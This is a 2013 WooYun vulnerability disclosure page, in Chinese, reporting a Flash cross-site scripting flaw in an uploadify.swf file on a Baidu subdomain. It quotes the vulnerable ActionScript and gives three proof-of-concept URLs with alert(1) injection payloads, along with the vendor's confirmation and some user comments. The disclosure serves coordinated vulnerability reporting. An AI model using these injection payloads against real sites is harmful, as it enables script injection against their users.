当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025359

漏洞标题:百度某分站flash xss

相关厂商:百度

漏洞作者: Rona

提交时间:2013-06-07 15:29

修复时间:2013-07-22 15:29

公开时间:2013-07-22 15:29

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-07: 细节已通知厂商并且等待厂商处理中
2013-06-07: 厂商已经确认,细节仅向厂商公开
2013-06-17: 细节向核心白帽子及相关领域专家公开
2013-06-27: 细节向普通白帽子公开
2013-07-07: 细节向实习白帽子公开
2013-07-22: 细节向公众公开

简要描述:

某站flash xss。

详细说明:

this.param = LoaderInfo(this.root.loaderInfo).parameters;
public function setButtonSize()
{
if(this.param.hideButton)
{
this.browseBtn.width = this.param.width;
this.browseBtn.height = this.param.height;
}
ExternalInterface.call("jQuery(\"#" + this.param.uploadifyID + "\").attr(\"width\"," + this.param.width + ")");
ExternalInterface.call("jQuery(\"#" + this.param.uploadifyID + "\").attr(\"height\"," + this.param.height + ")");
return;

}


由于以上三个参数输入没有过滤导致可以利用闭合实行xss攻击,"));}catch(e){alert(1);}

漏洞证明:

http://openresearch.baidu.com/r/cms/www/bd01/flash/uploadify.swf?uploadifyID=00%22%29%29;}catch%28e%29{alert%281%29;}//%28%22
http://openresearch.baidu.com/r/cms/www/bd01/flash/uploadify.swf?width=100%29%29}catch%28e%29{alert%281%29;}//%28%22
http://openresearch.baidu.com/r/cms/www/bd01/flash/uploadify.swf?height=100%29%29}catch%28e%29{alert%281%29;}//%28%22

修复方案:

QQ截图20130607152131.jpg

版权声明:转载请注明来源 Rona@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2013-06-07 17:55

厂商回复:

感谢提交,马上联系处理!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-06-07 23:25 | Rona ( 实习白帽子 | Rank:88 漏洞数:23 | test)

    这评3rank,只得到1rank这样也太坑了。又不是小厂商。

  2. 2013-07-07 23:47 | F4K3R ( 普通白帽子 | Rank:297 漏洞数:31 | 学习)

    习惯了就好~